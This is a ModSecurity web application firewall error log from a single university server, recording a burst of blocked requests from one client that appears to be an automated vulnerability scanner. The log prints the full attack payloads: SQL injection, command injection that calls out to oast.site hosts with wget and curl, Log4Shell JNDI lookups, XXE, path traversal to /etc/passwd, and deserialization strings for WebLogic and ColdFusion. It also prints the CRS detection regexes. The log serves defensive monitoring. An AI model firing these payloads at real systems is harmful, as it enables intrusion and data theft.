[Tue Aug 29 11:31:29.506802 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQTKH4AAAA1"]
[Tue Aug 29 11:31:29.580938 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQDFT0AAAAl"]
[Tue Aug 29 11:31:30.320139 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQEGJEAAAAm"]
[Tue Aug 29 11:31:31.386090 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgmdid8hdybu4ir.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQKOb8AAAAs"]
[Tue Aug 29 11:31:32.404982 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQEGJcAAAAm"]
[Tue Aug 29 11:31:33.609352 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQJWt4AAAAr"]
[Tue Aug 29 11:31:33.655139 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlg13yhm558iqf7a.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQJWt8AAAAr"]
[Tue Aug 29 11:31:34.383118 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAANsASsAAAAD"]
[Tue Aug 29 11:31:35.379457 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQEGK8AAAAm"]
[Tue Aug 29 11:31:36.359479 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQUH-YAAAA2"]
[Tue Aug 29 11:31:36.381297 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgh5t4cnp8x3e1t.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQmR3gAAAAH"]
[Tue Aug 29 11:31:37.335609 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQEGLcAAAAm"]
[Tue Aug 29 11:31:37.457405 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAPah1cAAAAL"]
[Tue Aug 29 11:31:38.299644 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgm5f1fnsxheepp.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQmR4AAAAAH"]
[Tue Aug 29 11:31:38.520714 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQmR4QAAAAH"]
[Tue Aug 29 11:31:38.675080 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlg1e9zpkkkooijc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQA-9wAAAAi"]
[Tue Aug 29 11:31:39.410768 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg5jqtfzhikxq7t.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAPDn7YAAAAP"]
[Tue Aug 29 11:31:40.378659 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQNwHQAAAAv"]
[Tue Aug 29 11:31:41.608752 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQEGMUAAAAm"]
[Tue Aug 29 11:31:43.319747 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQJWwQAAAAr"]
[Tue Aug 29 11:31:44.316850 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQSWNwAAAA0"]
[Tue Aug 29 11:31:44.316928 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQSWNwAAAA0"]
[Tue Aug 29 11:31:44.331050 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQJWwYAAAAr"]
[Tue Aug 29 11:31:44.360566 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAP6NPIAAAAQ"]
[Tue Aug 29 11:31:44.383423 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQR460AAAAz"]
[Tue Aug 29 11:31:45.312459 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgmnyut1hux3j4f.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAANWgU0AAAAG"]
[Tue Aug 29 11:31:45.453230 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQkBX4AAAAC"]
[Tue Aug 29 11:31:46.356833 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAPMmKgAAAAY"]
[Tue Aug 29 11:31:47.379088 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQMrvwAAAAu"]
[Tue Aug 29 11:31:47.379989 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAPDn8oAAAAP"]
